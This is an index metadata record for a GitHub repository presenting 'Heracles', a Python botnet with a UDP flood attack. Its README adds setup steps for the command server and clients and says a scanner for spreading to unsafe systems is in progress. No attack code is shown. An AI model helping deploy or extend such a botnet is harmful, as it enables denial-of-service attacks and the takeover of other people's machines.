{"id":28261966,"url":"https://github.com/maxi-schaefer/heracles","last_synced_at":"2026-06-30T19:31:26.843Z","repository":{"id":216959365,"uuid":"742541358","full_name":"maxi-schaefer/Heracles","owner":"maxi-schaefer","description":"Heracles is a simple botnet I created, it uses sockets to connect with the clients and the only attack protocol at the time (13/1/2024) is UDP, so feel free to commit to this project.","archived":false,"fork":false,"pushed_at":"2024-01-13T11:08:23.000Z","size":42,"stargazers_count":1,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-16T01:40:52.435Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/maxi-schaefer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2024-01-12T17:56:07.000Z","updated_at":"2024-01-23T15:28:11.000Z","dependencies_parsed_at":"2024-01-13T22:25:39.498Z","dependency_job_id":"eeefcf1c-152e-480b-837b-662e321e2d17","html_url":"https://github.com/maxi-schaefer/Heracles","commit_stats":null,"previous_names":["maxi-schaefer/heracles"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/maxi-schaefer/Heracles","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maxi-schaefer%2FHeracles","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maxi-schaefer%2FHeracles/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maxi-schaefer%2FHeracles/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maxi-schaefer%2FHeracles/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/maxi-schaefer","download_url":"https://codeload.github.com/maxi-schaefer/Heracles/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maxi-schaefer%2FHeracles/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34981390,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-30T02:00:05.919Z","response_time":92,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-05-20T06:12:02.402Z","updated_at":"2026-06-30T19:31:26.381Z","avatar_url":"https://github.com/maxi-schaefer.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Heracles Open Source Botnet\n\n\u003e ⚠️ This is for educational purpose only\n\nHeracles is a simple botnet I created, it uses sockets to connect with the clients and the only attack protocol at the time (13/1/2024) is UDP, so feel free to commit to this project.\n\nCurrently working on coding a tcp scanner for spreading the botnet on unsafe systems.\n\n## Demo\n![](./demo.png)\n\n## How to setup\n\n1. Clone this repository\n```bash\ngit clone https://github.com/maxi-schaefer/heracles.git\n```\n\n2. Change the ip address and the port to your own\n\u003cbr\u003eServer (./server/heracles.py)\u003c/br\u003e\n```python\n#...\n\nclass Server():\n                                                # IP         PORT\n    def __init__(self, connect:Tuple[str, int]=(\"127.0.0.1\", 6969)):\n        clear()\n#...\n```\n\n\u003cbr\u003eClient (./client/client.py)\u003c/br\u003e\n```python\n#...\n\nclass Client():\n    run = False\n                                                # IP         PORT     \n    def __init__(self, connect:Tuple[str, int]=(\"127.0.0.1\", 6969)) -\u003e None:\n        signal.signal(signal.SIGINT, self.exit_gracefully)\n        signal.signal(signal.SIGTERM, self.exit_gracefully)\n#...\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmaxi-schaefer%2Fheracles","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmaxi-schaefer%2Fheracles","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmaxi-schaefer%2Fheracles/lists"}